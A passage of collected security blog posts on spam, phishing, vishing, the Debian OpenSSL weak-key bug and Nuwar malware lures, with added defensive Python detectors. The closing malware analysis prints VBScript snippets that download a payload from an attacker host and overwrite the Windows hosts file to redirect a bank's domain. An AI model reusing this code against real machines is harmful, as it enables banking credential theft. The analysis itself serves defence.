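    """Rewrite an outbound envelope sender (MAIL FROM) into a signed, expiring form."""
    now = time.time() if now is None else now
    expiry_field = f"{(_day_number(now) + days_valid) % 1000:03d}"
    tag = f"0{expiry_field}{_mac(key, expiry_field, address)}"   # leading "0" = key id
    return f"{TAG_PREFIX}{tag}={address}"


def verify_return_path(tagged, key=BATV_KEY, now=None, days_valid=7):
    """Return the original address if the tag is authentic and unexpired, else None."""
    now = time.time() if now is None else now
    if not tagged.startswith(TAG_PREFIX):
        return None
    tag, sep, address = tagged[len(TAG_PREFIX):].partition("=")
    if not sep or len(tag) != 10 or tag[0] != "0":
        return None
    expiry_field, mac = tag[1:4], tag[4:]
    if not expiry_field.isdigit():
        return None
    if not hmac.compare_digest(_mac(key, expiry_field, address), mac):
        return None
    # The expiry is a 3-digit day counter, so the comparison is modulo 1000:
    # anything further in the "future" than days_valid has actually wrapped past.
    remaining = (int(expiry_field) - _day_number(now) % 1000) % 1000
    if remaining > days_valid:
        return None
    return address


def accept_inbound(rcpt_to, mail_from, key=BATV_KEY, now=None):
    """Inbound MTA policy: bounces (empty MAIL FROM) must carry a valid tag.

    Returns (accept, reason). Ordinary mail is passed through unchanged."""
    if mail_from != "":
        return True, "not a bounce"
    original = verify_return_path(rcpt_to, key, now)
    if original is None:
        return False, "bounce to unsigned or invalid return path"
    return True, f"bounce for {original}"
```

    The signing step only needs to happen on your outbound MTA; the check only needs to happen where you accept mail with a null sender. Mail that never left your server can never produce a correctly tagged address, which is exactly the backscatter case above.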

    Code Cleanup Gone Wrong

    Almost two years ago in 2006 Debian decided to clean up their OpenSSL implementation. They found a few lines of code that were causing Valgrind and Purify to complain about access to uninitialized memory. Without a major investigation into the purpose of the suspect lines of code they were simply removed. All basic tests continued to pass with the lines of code removed and Purify and Valgrind both stopped complaining about the improper memory access. The change was forgotten and everyone believed that the OpenSSL implementation was working just fine.

    For the purposes of all the OpenSSL algorithms there was no deficiency. Encryption and decryption and hashes would be calculated correctly. The problem was that the PRNG used for generating keys by the OpenSSL library had been crippled when those critical lines were removed back in 2006. This was not discovered until just this week when Luciano Bello discovered that without those lines the only ‘random’ data used to seed the PRNG was the PID of the OpenSSL process. On many Linux systems the PID is limited to a positive signed 16 bit value. This means there are only 32,767 possibilities. When new keys and certificates were generated by OpenSSL they relied on this number to provide all of their entropy.

    The consequence of this bug is that from September 2006 until May 2008 there were only 32,767 possible keys that could be generated by OpenSSL. Several individuals have generated “black lists” of every possible key that this OpenSSL implementation could generate. According to some reports this entire list can be generated in a couple hours. This weakness affects any key generated by OpenSSL including SSH and DNSSEC keys among others.
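    The arithmetic in the paragraph above is easy to check with a toy model. This is an added example, not OpenSSL or Debian code: the “key generator” is just a hash of the PRNG seed, the broken seed is the two-byte PID alone (capped at the 32,767 value the post cites), and the intended seed mixes in OS entropy. Building the set of every key the broken generator can produce is the same job the “black lists” in the post did for real keys, and `is_weak` is the corresponding audit check.

```python
import hashlib
import os

PID_MAX = 32767     # the positive signed 16-bit PID ceiling the post cites


def toy_keygen(seed: bytes) -> bytes:
    """Toy key derivation: the key is a deterministic function of the PRNG seed.
    Stands in for OpenSSL's key generation; it is not OpenSSL code."""
    return hashlib.sha256(b"toy-key|" + seed).digest()


def broken_seed(pid: int) -> bytes:
    """Seed as in the crippled PRNG: the process ID is the only input."""
    return pid.to_bytes(2, "big")


def proper_seed(pid: int, entropy: bytes) -> bytes:
    """Seed as intended: the PID mixed with real entropy from the OS."""
    return pid.to_bytes(2, "big") + entropy


def fingerprint(key: bytes) -> str:
    """Short identifier for a key, as a key blacklist would store it."""
    return hashlib.sha1(key).hexdigest()


def weak_key_blocklist() -> set:
    """Fingerprints of every key the broken generator can ever produce.
    With only the PID as entropy there are at most PID_MAX of them."""
    return {fingerprint(toy_keygen(broken_seed(pid))) for pid in range(1, PID_MAX + 1)}


def is_weak(key: bytes, blocklist: set) -> bool:
    """Audit check: does this key appear in the precomputed weak-key list?"""
    return fingerprint(key) in blocklist


def distinct_broken_keys() -> int:
    """Size of the whole 'key space' of the broken generator."""
    return len(weak_key_blocklist())
```

    Enumerating the entire list takes a fraction of a second here because the toy generator is cheap; the post’s “couple of hours” for real RSA and DSA keys is the same loop with real key generation inside it. The practical lesson for administrators is the same either way: once such a list exists, any key on it must be treated as public.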

    Many machines will fail to be updated in a quick manner after the discovery of this vulnerability. There are already many botnets which spread by simply brute forcing common username and password combinations over SSH. It will probably not be long until some of these networks are modified to start attempting RSA authentication using the faulty OpenSSL keys. These attacks will not take long to develop and have the potential to compromise large numbers of machines. It is important for administrators to note that even if they replace and upgrade the OpenSSL package they must recreate and replace any keys or certificates generated by the broken OpenSSL kit.

    The moral for developers is to always be sure you understand the impact of your code changes. This goes extra for critical libraries like OpenSSL. Minor and seemingly inconsequential changes can leave major problems festering undetected for years. There may also be some changes in the way that Debian developers work with the developers of other related software packages like OpenSSL. Hopefully increased communication between the development teams in the future can prevent this kind of bug from recurring.

    Gas Spam

    In my role as an anti-spam researcher I get to see a lot of spam. Most of the spam I see can be categorized into a fairly small range of spam types. Common examples include pharmacy, stock and watch spam.

    Over the last few weeks I have seen a new type of spam. This is spam which is trying to sell a product to save money on gas. Below is an example of a gas spam:


    Gas Spam Example

    Currently McAfee detects gas spam. Volume is low for this type of spam, typically making up 0.2% of all spam.

    Given the high price of oil it is not surprising that a spammer has started selling a product which claims to reduce gas bills.

    Spam in my Calendar?

    Have you had any odd meetings in your Outlook or Google calendars lately? I’ve been monitoring an interesting spamming technique over the past few weeks where spammers send automatically accepted meeting requests (if you allow that) to your calendar.

    The spam is originating from Gmail accounts, but the Google and Outlook calendar functions are compatible, so the meeting request goes straight into your calendar and you probably won’t notice it until you get a reminder at the spammer’s chosen time.

    All the samples I’ve seen so far are Nigerian Scams which is interesting in itself as the Nigerian scammers have traditionally been less advanced in terms of coming up with new tricks.

    This tactic adds a further nuisance factor for the recipients of this spam, as it sets your time as “Busy”. Sure, you can turn off automatic acceptance of meeting requests via the Calendar options in Outlook and in Google Calendar, but that feature is provided for a reason, so why should the spammers stop us using it? This spam campaign has been low volume and targeted, as is the nature of the Nigerian Scam email, but there’s been a lot of talk in the last few months about Gmail’s CAPTCHA being broken, so it wouldn’t surprise me if the botnet spammers pick it up pretty soon!

    30th Anniversary of spam

    Happy Anniversary!

    May 3, 2008, marks the 30th anniversary of spam mail. Yes, it’s been three decades since Gary Thuerk, a Digital Equipment Corporation (DEC) employee at that time, broadcast the very first unsolicited advertising message announcing a new product, the DEC-20, to everyone on the Internet’s predecessor, the Advanced Research Projects Agency Network (ARPANET). Developed by the Defense Advanced Research Projects Agency (DARPA) of the United States Department of Defense, the ARPANET was the world’s first operational packet switching network and paved the way for the information superhighway we now call the world wide web. Take a look at the innocuous message and a write up of the events surrounding this unsolicited commercial email by clicking here: http://www.templetons.com/brad/spamreact.html.

    The term “spam”, which refers to SPAM®, a canned meat product sold by the Hormel Foods Corporation, was coined to describe unwanted and unsolicited commercial email. A description of why this term was used is here: http://en.wikipedia.org/wiki/Spam_%28electronic%29#History. The term wasn’t used much in the early days, and it wasn’t until 1994 that spamming started in earnest. Deliberate commercial spamming as a form of advertising is believed to have been started by a law firm, Canter & Siegel. In 1994, the firm sent a message advertising their immigration services to more than 6,000 Usenet newsgroups. They developed mass-mailer software to automate the distribution of the email, a practice still used by spammers today.

    Over the past 30 years, the face of spam has changed dramatically—from simple text, to obfuscated text, phishing emails, and spammed malware. And it’s even gone beyond that to image spam, spear phishing, attachment spam, and recently even MP3 based spam. At first, spam was sent from single user accounts. Later, spammers pushed their messages through open mail servers. Today, these unwanted emails are typically sent via huge networks of zombie machines, which are designed by malware writers to send large volumes of spam very efficiently. Spamming has also seeped into new venues and morphed into new forms. Spam has evolved from newsgroup and email spamming to Instant Messaging, mobile phone spam, and blog and search result manipulation spam.

    Despite Bill Gates’ prediction in 2004 that spam would cease to exist by 2006 (http://news.bbc.co.uk/1/hi/business/3426367.stm), there appears to be no end in sight, even in spite of recent laws, such as the Controlling the Assault of Non-Solicited Pornography And Marketing Act of 2003 (CAN-SPAM) introduced to help curb spam. Why does the law lack legs? It’s mainly because today’s spammers, who are motivated by the prospect of financial gains, largely operate outside of countries with strict anti-spam laws.

    In some ways, Bill Gates’ prediction was correct in that spam filtering solutions have been developed over this period of time to detect and filter almost all the spam that is sent, but this is cleaning up the problem, rather than eliminating it entirely. I don’t think anyone would favour an “email tax” to reduce spam, and Challenge/Response systems only contribute to more unwanted mail and slower communications. I personally believe it would take a concerted effort on the part of Internet Service Providers (ISPs) and Internet backbone providers to filter spam at its sources and block rogue “bullet proof” ISPs. Technology currently exists to identify and isolate hijacked spam sending zombie PCs, but ISPs appear reluctant to commit to the infrastructure and customer support needed to implement these systems in a highly competitive and price-sensitive market. A better alternative may be a transition to a newer, more secure, mail protocol that would make it easier to eliminate spam email at the source.

    In addition to ever more creative ways to block received spam, is an upgrade to the SMTP protocol the answer? Or do we need more government legislation? Or is it something else altogether? Will it take another 30 years to put spammers out of business? I sure hope not!

    Beware of Forgeries

    A recent report by the OECD (Organisation for Economic Co-operation and Development) indicated that counterfeit and pirated goods in 2005 could have had a value of up to 200 billion U.S. dollars.

    One path to fake goods is via spam, which frequently offers counterfeit medicines and replica watches. A recent post from the French CERT-LEXSI blog caught my attention regarding fake luxury mobile phones selling for absolutely unbeatable prices.

    These phones are normally manufactured by Vertu, a British subsidiary of Nokia, and are sold in luxury shops in Monte Carlo, Cannes, or Beverly Hills. On their official top-quality site (www.vertu.com), prices are not mentioned, but by visiting some authorised retailer Web sites I found exorbitant figures. Some mobiles, bedecked in gold and diamonds, exceed $90,000. Really too expensive for me!

    Using Google, it’s really easy to find fake sites offering these counterfeit marvels. In fact it is easier to find the fake sites than the authorized ones!

    And the prices–assuming you need one of these–are attractive: less than $1,000 for a copy of an original that sells for $97,300.

    Regular spam campaigns promote such Vertu “replica” sites. Be vigilant, however, because appearances can be deceiving. Sites are numerous and their common feature is their high-quality, professional look–with black backgrounds that imitate the official site.

    These sites are hosted at various providers in various countries (USA, Germany, and Hong Kong). Some of them seem clean; others are known for bulletproof hosting services and their relationship with the Russian Business Network, an alleged cybercrime organization. The registrars are also diverse (Estonia, Russia, and Korea) but more questionable. It is surprising that these do not require any name verification before accepting registrations. But once you know that a lot of spam and malware-related Web sites come from them, their permissiveness is easier to understand. Registrant addresses and e-mails give us an inkling regarding the nationality of their owners: China and Russia.

    For the potential buyer, the key issue concerns the risk. The Swiss Watch Industry clearly points out that the buyer is the first victim, because purchasing counterfeits is:

    • Agreeing that piracy is OK; the counterfeiter seeks to appropriate somebody else’s hard work and investment.
    • Supporting and financing organized crime; links between counterfeiting activities and criminal networks have been established in many cases.
    • Accepting underground and child labor.
    • Endangering your own health and safety; the risk is real with medicines, aircraft and auto spare parts, medical supplies, and cosmetics.
    • Reducing employment and stifling growth; this form of criminality contributes to the reduction of employment, which is estimated to cost more than 200,000 jobs worldwide per year.
    • Being liable to criminal sanctions; the buyer may face criminal and financial sanctions. The mere possession of counterfeits is illegal in many countries. Furthermore, penalties could be claimed by legitimate intellectual property rights’ owners. Customs also can seize and destroy illegal items and assess fines.

    And if these considerations don’t stop you, remember you run the risk of not receiving the goods you pay for; instead you might have your banking details stolen and reused in future malevolent activities. None of the sites I visited yesterday offered a secure Internet payment system; one of them housed a hidden Iframe linked to a known password-stealing Trojan.

    The IRS Phishing Tax Year

    The Internal Revenue Service (IRS) is some phishers’ favourite target, especially during the tax season each year. We first saw IRS phishing emails in our spam traps in 2005 and have seen them every year since, particularly when the U.S. tax year comes to a close.

    Does the early bird catch the worms?

    Who would consider a tax issue as early as in September? The phishers must think someone would. We started to see IRS phishing e-mails as early as September last year. The volume has increased in the following months, with a sharp increase in January 2008, and is showing no signs of abating today.

    Targeting both individuals and businesses

    Most IRS phishing e-mails target individuals, but there were several campaigns which targeted business/corporate accountants and treasury managers this year. The phishing e-mails claimed that there were some recent changes to business and corporate tax laws and asked the recipient to download the relevant files by clicking the embedded links.

    Using an IP address instead of a normal domain name is commonly seen in phishing e-mails, because the phishers want to hide the phish domain name from the recipients’ eyes. In the sample below the phisher also claims that the encoded IP is a document reference and that the phishing URI is a personalized link.
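    The “encoded IP” trick above is worth having a detector for, because a plain numeric host can be written as one 32-bit decimal number, as hex, or as octal and still resolve. The following is an added example, not McAfee code; it assumes the classic inet_aton parsing rules (one to four dot-separated components, each decimal, 0x-hex or leading-zero octal, with the last component filling the remaining bytes), and the URLs in the test are constructed. It also flags a user-info prefix, which is the other way a plausible name gets pushed in front of the real host in a link.

```python
from urllib.parse import urlsplit


def _parse_part(part: str) -> int:
    """Parse one dotted component as inet_aton does: 0x.. hex, leading 0 octal,
    otherwise decimal. Anything that is not plain alphanumeric is rejected."""
    if not part or not all(c.isalnum() for c in part):
        raise ValueError(part)
    if part[:2] in ("0x", "0X"):
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def decode_numeric_host(host: str):
    """Return the dotted-quad IPv4 address a numeric host resolves to, or None
    if the host is an ordinary name (or not a valid numeric form)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    # All but the last component are single octets; the last fills the rest.
    if any(v > 0xFF for v in values[:-1]):
        return None
    last_bits = 8 * (5 - len(parts))
    if values[-1] >= 1 << last_bits:
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << last_bits) | values[-1]
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def classify_link(url: str) -> dict:
    """Flag the tell-tales described in the post: a raw or encoded IP where a
    domain name should be, and a user-info prefix hiding the real host."""
    parts = urlsplit(url)
    host = parts.hostname or ""          # urlsplit lower-cases and strips userinfo/port
    ip = decode_numeric_host(host)
    has_userinfo = parts.username is not None
    return {
        "host": host,
        "numeric_ip": ip,
        "userinfo": has_userinfo,
        "suspicious": ip is not None or has_userinfo,
    }
```

    Run `classify_link` over every href in a message and you get a simple, content-independent signal that survives the phisher changing logos and wording; the decoded dotted quad is also what you want in the log, not the obfuscated form.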

    Common characteristics of an IRS phishing e-mail

    The IRS phishing e-mails normally have a faked “From:” header to make the recipients think the message is from the IRS. The message body usually begins with one of several variations of the IRS logo. They usually follow this with how much money you are supposedly due to be refunded for the year. Then the recipients are asked to fill in a tax refund form by clicking a link which is normally hidden behind text such as “Please click here”. The link leads the recipients to an online form which requests personal information such as Social Security Number, name, address, date of birth, mother’s maiden name, bank account number, credit card number, expiration date, card verification number, ATM PIN and name of the issuing bank.

    Recently some phishers have enclosed an HTML attachment with the e-mail rather than including a link to a phishing web site, and have asked the recipient to open the attachment and submit the details via the attached form.

    We also spotted an IRS Vishing (short for “voice phishing”) campaign this year.

    All in all it has been a busy tax season for the IRS phishers. The IRS give some helpful tips on how to avoid being caught out by these types of phishing emails on their web site.

    S.P.A.M. Experiment Update

    Meeting the German participants of the McAfee SPAM Experiment for dinner yesterday turned out to be very interesting and provided some unexpected results. After 14 days living on a Spam-mail diet they are still in good shape. Some are so into it that they even installed SiteAdvisor to find out, in advance, if a site is likely to send you spam when you leave your email address there…

    Getting in trouble with the girl-friend for browsing dating web sites while leaving his mail-address for possible use by spammers was one of the less expected (and desired) results.

    And then this: Collecting spam through surfing porn sites really does not work! All who tried told me they didn’t receive much spam when leaving their email on such sites. That really was a surprise for me. I would have expected a lot of spam, as there seems to be a fairly obvious link between porn and certain drugs and enhancement pills…

    Constantly living in a world full of (empty) promises seems to have some effect as well: “It’s nice sitting here with you, but soon I’ll be hanging out with Tom Cruise and Jessica Alba and I will even get money for it” – it’s amazing what some shady people promise you, just to get your email address and other personal data.

    There was some amazement when two participants figured out they had received nearly identical advance-fee scams: One in English, the other one in the Polish language.

    Well, I’m sure all participants will have a lot of interesting experiences and stories to share at the end of the experiment and I sincerely hope they manage to stop clicking on all those ‘you are the 100,000,000,000 visitor of this webpage’-banners ;)

    Oh, and a last note: If there is one movie you should watch this year, make sure it’s the Futurama: Bender’s Big Score where Spam and Phishing play key elements in the story!!

    ‘Unsafe Hex’ About to Get More Costly?

    A recent article in The Register seems to imply that if you’ve got out-of-date security software, any fraudulent charges to your accounts could suddenly be your liability. The advice given by the British Bankers’ Association includes much more than just the state of one’s security software; this could just as easily include misaddressing a check or falling victim to a phishing attack, among other things. On the other hand, it’s highly unlikely it would ever be worth the bank’s effort to invoke this clause.

    From the Banking Code of the British Bankers’ Association

      12.11 If you act fraudulently, you will be responsible for all losses on your account. If you act without reasonable care, and this causes losses, you may be responsible for them. (This may apply, for example, if you do not follow Section 12.5 or 12.9 or you do not keep to your account’s terms and conditions.)

    These two sections offer quite a few bullet points about how not to be a victim of identity theft or financial fraud.

      12.5
      • Do not keep your checkbook and cards together.
      • Do not let anyone else use your card, and do not tell anyone else your PIN, password, or other security information.
      • Your bank or building society will never ask you for your PIN. If you are in any doubt about whether a caller is genuine or if you are suspicious, take the caller’s details and call us.
      • If you change your PIN, you should choose your new PIN carefully.
      • Try to remember your PIN, password, and other security information, and securely destroy the notice as soon as you receive it.
      • Never write down or record your PIN, password, or other security information.
      • Always take reasonable steps to keep your card safe and your PIN, password, and other security information secret at all times.
      • If your card issuer takes part in a secure online payment system (such as Verified by Visa or MasterCard SecureCode), consider signing up either at their Web site or whenever you are given the option while shopping online. This involves your registering a password with your card company; you will be asked for the password whenever you shop at an online retailer taking part in the scheme. You should keep this password secret.
      • Never give your account details or other security information to anyone unless you know who they are and why they need them.
      • Keep your card receipts and other information about your account containing personal details (for example, statements) safe and get rid of them carefully.
      • Take care when storing or getting rid of information about your accounts. People who commit fraud use many methods, such as “bin raiding” (a.k.a., dumpster diving) to get this type of information. You should take simple steps such as shredding printed material.
      • Be aware that your mail is valuable information in the wrong hands. If you don’t receive a bank statement, card statement, or any other expected financial information, contact us.
      • You will find the APACS Web site a helpful guide on what to do if you suspect card fraud.
      12.9
      • Keep your PC secure. Use up-to-date anti-virus and spyware software and a personal firewall.
      • Keep your passwords and PINs secret.
      • We (or the police) will never contact you to ask you for your online banking or payment card PINs, or your password information.
      • Treat e-mails you receive from senders claiming to be from your bank or building society with caution and be wary of e-mails or calls asking you for any personal security details.
      • Always access Internet banking sites by typing the bank or building society’s address into your Web browser. Never go to an Internet banking site from a link in an e-mail and then enter personal details.
      • Follow our advice: Our Web sites are usually a good place to get help and guidance on how to stay safe online.
      • Visit www.banksafeonline.org.uk for useful information.

    But wait, there’s a caveat: They won’t invoke this willy-nilly:

      12.12 Unless we can show that you have acted fraudulently or without reasonable care, your liability for your card being misused will be limited as follows.

    Invoking this clause would be far too difficult and costly in most cases. It would take a particularly large sum lost to fraud before a bank deemed it worth the cost of an investigation, the alienation of a customer, and a heap of bad PR.

    Although this is all good advice from the BBA, the assertion that people will suddenly be financially liable for having out-of-date security software looks like a case of spreading FUD.

    Nuwar Loves You Not

    It’s déjà vu all over again with the latest Nuwar campaign over the weekend, which offers belated Valentine e-cards. The malicious e-cards contain a URL to one of several blogspot.com pages sporting a love theme and linking to the Storm executable. The bait pages themselves contain no exploits and rely solely on the end user clicking through and installing the malware. The executables being offered are “love.exe” and “withlove.exe”, both hosted on a fast-flux domain. A copy of one of the BlogSpot pages hosting Storm is shown below.

    Love-Themed Nuwar Page

    This is not the first time BlogSpot.com has been abused to host malware-laced pages. Zlob, a.k.a. the Puper Trojan, did the same last year, and current spam messages commonly carry Google Blogger links to blogspot.com pages that simply forward to the spammer’s domain.

    But why would the Nuwar gang launch a Valentine-themed campaign in April? Either the Storm authors are suffering from an acute Valentine hangover or their holiday calendar is messed up! Especially since Easter passed surprisingly quietly, without a Storm :-)

    S.P.A.M. Experiment Update

    Within the first 24 hours, participants in McAfee’s S.P.A.M. Experiment have already started to receive a wide range of spam. The U.S. economic crunch (bearing in mind I am NO economist ;-) ) may be having an effect on spam campaigns: several of the recipients, browsing the Web independently of each other, have started to receive offers centered on guaranteed loans, credit cards, and debt relief.

    The spam that isn’t offering money is trying to take it away from the participants. Three of our “victims” have already been targeted by phishers! It didn’t take long at all for some of their e-mail addresses to be picked up and exploited by fraudsters.

    According to their blogs, some of the participants started to receive spam almost immediately after clicking on pop-ups on the first day and providing their e-mail addresses for free offers. As usual with such offers, it turns out to be almost impossible to meet the conditions for getting the free Xboxes, Wiis, iPods, iPhones, etc.

    At the time of this writing, the overall spam submission counts have exceeded 550 from 17 of the participants. One participant alone has received more than 130 pieces of spam!

    More to come during the next 29 days. Make sure you follow the participants’ blogs and stay tuned.

    The S.P.A.M Experiment Kicks Off

    Take equal parts e-mail, willing and daring participants, some shady ePharmacies (OK, OK, it’s Viagra), a few eCards, and a heavy dose of dubious business activities. Mix them together with just a sprinkle of reality TV (or blogging, in this case) and you have The S.P.A.M. Experiment, which launched this week.

    Avert Labs invests considerable resources in fighting spam and in educating users about it. Anyone who follows this blog certainly knows that. The purpose of this experiment, however, is quite different: to show spam for what it really is, dangerous. Spam is not just a nuisance. It’s a constantly evolving threat to our identities and our wallets, and it puts users at risk of far more than lost inbox space. To show spam for the threat it really is, we are actually having users do what we always tell them not to do!

    Come on. You gotta admit it. It is very cool.

    The S.P.A.M. Experiment is designed to show the scale of the spam problem and the risks associated with opening or responding to unsolicited e-mail. It will demonstrate just how resourceful and quick cybercriminals (and make no mistake here, spammers are criminals) are at creating new ways of evading anti-spam filters and relieving people of their money. The worldwide participants will share their experiences through blogging, so you will be able to follow the action as it develops. I recommend you subscribe to the many global feeds that are here. We started only earlier this week and the participants are already getting results!

    Want to know why spam is dangerous? Want to see how spam links to cybercrime? We are gonna show you over the next 30 days.

    Find out TODAY which websites will be infected TOMORROW!!

    Yes, today is April Fool’s Day and the usual pranks are circulated through the net. Some funny. Some not so funny. And some very intriguing ideas.

    Offensivecomputing.net, a site dedicated to malware analysis, was suddenly made up to look like one of the current Nuwar campaigns, complete with file downloads (benign ones) that may have left many visitors staring at their screens. I did not link directly to them, because including links here that result in executables being automatically downloaded is not a good idea (plus it’s their main page, which will likely be changed back within hours).

    But the really interesting idea came from Google: an engine to search tomorrow’s Web, today! Finding out which Web sites will sport malicious downloads the next day, or which will fall victim to the ongoing mass hacks (reported on here and most recently by Dancho Danchev) within the next 24 hours... that would be priceless!

    But then Google took security nightmares to the next level with another idea: sending e-mail back in time. While that feature would be a spear phisher’s dream come true, I am rather happy it’s not real.

    Dial V for Vish

    In a natural evolution of phishing, Internet scamsters are switching to “vishing”, short for “voice phishing”, to steal user information. Vishing combines Voice over IP (VoIP) telephony with clever social engineering to obtain the victim’s personal and financial details, exploiting the trust people place in the traditional telephone system.

    With increased user education about Internet scams, people are more aware that a URL in an e-mail could be malicious. So instead of using a misdirected Web link to a phony banking site to steal user information, fraudsters lure victims into something that seems more credible: calling a toll-free number and following an automated recording that asks for account information.

    Potential victims get the usual convincing e-mail phish, dressed up to look like a genuine complaint. But instead of being directed to a Web site to resolve the pending issue, they are given a phone number to call. Those who call the “customer service” number are greeted with a copied recording of the targeted financial institution’s automated voice system and are asked to enter their card number in order to authenticate. They are then led through a series of voice-prompted menus that ask for PIN codes, card expiration date, date of birth and other critical information. Once the victim enters these details, the visher has enough to commit identity theft and make fraudulent use of the card.

    With the US tax deadline nearing, McAfee Avert Labs has observed a surge in IRS refund phishing attempts. In addition to the usual e-mail phish, we also observed IRS vishing campaigns targeting Visa or MasterCard debit cards.

    IRS Vish email

    Here’s another example of a vish campaign targeting a well known bank.

    Bank Vish email

    Other variants of vishing spoof CallerID so that an incoming call appears to come from a 1-800 number, or use SMS messages purporting to be from a bank. A text or pre-recorded voice message then persuades the victim that their account has been frozen due to suspicious activity. Because the incoming call displays a 1-800 number from a recognized institution, it creates a false sense of security about the authenticity of the message.

    Vishing is set to flourish with advances in Voice over Internet Protocol (VoIP) technology that enable cheap and anonymous Internet calling. Given the ease with which CallerID boxes can be tricked into displaying erroneous information, it is becoming increasingly difficult to distinguish phishing attempts from genuine attempts to contact customers.

    If you encounter a vishing attempt and have a question concerning your account or card, please contact the financial institution only using a telephone number obtained from your account statement, a telephone book or other verifiable, genuine correspondence.

    Nuwar Isn’t Fooling Around

    In “celebration” of tomorrow being April Fool’s Day, the people behind Nuwar, a.k.a. Storm, have launched a new e-mail spam campaign. An e-mail with a subject and short body text like “Happy April Fool’s Day!” carries the usual (for Nuwar, anyway) raw-IP HTTP link. Following that link brings up a page like this:

    Nuwar-Fool

    If you wait those 5 seconds, the page tries to download the file funny.exe to your computer. If you click on the image, it’s kickme.exe. And if you click on “click here”, it’s foolsday.exe. All of them are nothing but a new Nuwar variant.
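    The lure mechanics described here and in “Nuwar Loves You Not” above (a raw-IP link in the mail, then a bait page whose meta refresh, image link and “click here” all hand the browser an .exe) are simple enough to check for mechanically. The following Python is an added example, not code from the original post or from McAfee: it walks a page’s links and meta-refresh target and flags raw-IP hosts and executable downloads. The sample page is constructed to mirror the one described, and 192.0.2.10 is a documentation-range placeholder standing in for the fast-flux address.

```python
"""Flag Nuwar/Storm-style lure pages: raw-IP URLs and links that hand the
browser a Windows executable via href, image-wrapped links or meta refresh.
Added example; the sample page below is constructed, not a real capture."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Extensions Windows will execute directly when the user "opens" the download.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")

# Constructed stand-in for the April Fool's bait page; 192.0.2.10 is a
# documentation-range (RFC 5737) placeholder for the fast-flux host.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="5;url=funny.exe">
<title>Happy April Fool's Day!</title></head>
<body>
<a href="kickme.exe"><img src="fool.jpg"></a><br>
<a href="foolsday.exe">click here</a> if nothing happens.<br>
<a href="http://www.example.com/about.html">About</a>
</body></html>"""


class LinkCollector(HTMLParser):
    """Collect every URL the page can send the browser to, and by what means."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.targets = []  # list of (how, absolute_url)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.targets.append(("href", urljoin(self.base_url, attrs["href"])))
        elif tag in ("img", "iframe", "script") and attrs.get("src"):
            self.targets.append((tag + "-src", urljoin(self.base_url, attrs["src"])))
        elif tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            # content="5;url=funny.exe": the browser fetches funny.exe after 5 s
            m = re.search(r"url\s*=\s*['\"]?([^'\">;\s]+)", attrs.get("content") or "", re.I)
            if m:
                self.targets.append(("meta-refresh", urljoin(self.base_url, m.group(1))))


def host_is_raw_ip(url):
    """True when the URL's host is a literal IPv4/IPv6 address, not a name."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def points_to_executable(url):
    return urlparse(url).path.lower().endswith(EXECUTABLE_SUFFIXES)


def find_lure_indicators(html, base_url):
    """Return (how, url, reasons) for every target with at least one red flag."""
    collector = LinkCollector(base_url)
    collector.feed(html)
    findings = []
    for how, url in collector.targets:
        reasons = []
        if host_is_raw_ip(url):
            reasons.append("raw-ip-host")
        if points_to_executable(url):
            reasons.append("executable-download")
            if how == "meta-refresh":
                reasons.append("auto-download")  # no click needed at all
        if reasons:
            findings.append((how, url, reasons))
    return findings


if __name__ == "__main__":
    for how, url, reasons in find_lure_indicators(SAMPLE_PAGE, "http://192.0.2.10/"):
        print(f"{how:13s} {url:35s} {', '.join(reasons)}")
```

    Run against the constructed page, the meta-refresh target is the one to care about most: it needs no user interaction at all, which is why the post’s “if you wait those 5 seconds” is the dangerous branch. A legitimate name-based link to an HTML page (the example.com entry) produces no finding.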

    Phishing is Still Alive and Kicking

    A few days ago McAfee Avert Labs came across yet another example of how effective, and especially how dangerous, phishing can be. We received a sample in the form of a .exe file that, when executed, would start Internet Explorer and present the login page of a well-known Italian bank.

    At first sight, to the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud, as “only” the user name and password for the banking page were requested. Once these initial credentials were entered, a second page requested a card number, the expiration date, and the CVV2/CVC2 code. After this, you guessed it, a simple message: “Wrong details, try again!”

    What actually happens is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Host interpreter, wscript.exe; the VBS script is then removed from the system. Here are some interesting snippets of the code embedded in the executable:

    ' Shell object (used later to launch iexplore.exe) and the URL of the
    ' attacker-hosted hosts-file payload; x.x.x.x is the redacted address.
    Set WshShell = WScript.CreateObject("WScript.Shell")
    strURL = "http://x.x.x.x/twiki/b.txt"
    ' FileSystemObject gives the script read/write access to local files.
    Dim fso
    Set fso = CreateObject("Scripting.FileSystemObject")

    Further code fetches b.txt over HTTP with a Microsoft.XMLHTTP object and writes its contents to a local file.

    ' WindowsFolder is not a predefined VBScript constant; undeclared it is Empty,
    ' which GetSpecialFolder treats as 0, the Windows directory. The target is the
    ' hosts file, which the resolver consults before any DNS lookup.
    fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"

    This copies the contents of b.txt, fetched from the URL above, into the hosts file. Because the hosts file takes precedence over DNS, name resolution for the bank’s domain is now under the attacker’s control, regardless of what the legitimate DNS says.

    ' Launch IE on the bank's real hostname (now resolving to the attacker's IP)
    ' and delete the downloaded payload file to cover tracks.
    WshShell.Run "iexplore.exe"
    Set aFile = fso.GetFile(strOutFile)
    aFile.Delete

